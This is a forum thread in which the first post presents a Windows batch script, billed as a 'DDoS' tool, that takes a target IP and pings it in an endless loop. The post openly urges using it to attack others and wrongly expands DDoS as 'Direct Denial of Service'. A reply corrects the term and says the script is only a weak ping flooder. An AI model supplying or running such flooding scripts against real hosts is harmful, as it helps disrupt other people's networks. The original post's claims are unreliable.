Untagged Release How to make a simple Ping Flooder / DDoS

Status
Not open for further replies.

cApSL0ckb0mb3r

Active member
Joined
Feb 18, 2013
Messages
196
Reaction score
4
For those who don't know what DDoS is, it's a Direct Denial of Service attack.
It sends continuous hits to a server/website eventually shutting it down.

Do you want to make your own? Well I will show you. It will either work or just ping your own internet xD
Which I see a lot of dicks saying "Omg I just shut down a server omg omg I'm going to go and masturbate" or whatever.
When it just pinged their own internet so they couldn't retrieve information from a server because their ping is just, yeah. High.

What you need is notepad and a windows, my house has plenty of windows so this will work for me.

Okay, open up all the windows in your house.
Now open notepad.
I used this one.

vkx8k.jpg


Now copy and paste this into your notepad and edit it to your standards.
Code:
@echo off
mode 67,16
title ENTER THE NAME OF YOUR DDOS THING HERE
color 05
cls
echo.
set /p m=Targets IP:
ping %m% -i 1 -t 65000
set /p n=Packet Size(1-255):
echo.
:DDOS
color 0a
echo.
ping %m% -i %n% -t
goto DDOS

The "Color 0a" Represents the color of your text.
You can change them using these codes:
0 = Black 8 = Gray
1 = Blue 9 = Light Blue
2 = Green A = Light Green
3 = Aqua B = Light Aqua
4 = Red C = Light Red
5 = Purple D = Light Purple
6 = Yellow E = Light Yellow
7 = White F = Bright White


Just put a "0" in front of the desired number/letter.

Save it as DDoS.bat.
Now you can open it, type the targets IP, Port, Packet size and fuck them. Literally.
 

0B36

Expert
Joined
Jan 6, 2014
Messages
1,324
Reaction score
8
:face_palm: :face_palm: :face_palm: :face_palm: :face_palm: :face_palm: :face_palm:

Direct what ? It's called Distributed Denial of Service Attack. Man you're high on the worst cocaine possible. The attack is distributed across numerous machines and not on 1 machine.

DDoS attacks are not launched by scripts and cannot be done like that.

This is a ping flooder not DDoS in any way. Your dumbass script PINGS the server with some kb of data, which won't do jack shit to any network. Network will ping back that's all. This ain't ddos, idiot.
 

0x_

Wtf I'm not new....
Staff member
Administrator
Joined
Feb 18, 2013
Messages
1,123
Reaction score
176
the question is:
is it dumb to bump a fucking old thread?
also, you can explain something also the nice way.
 
Status
Not open for further replies.
Top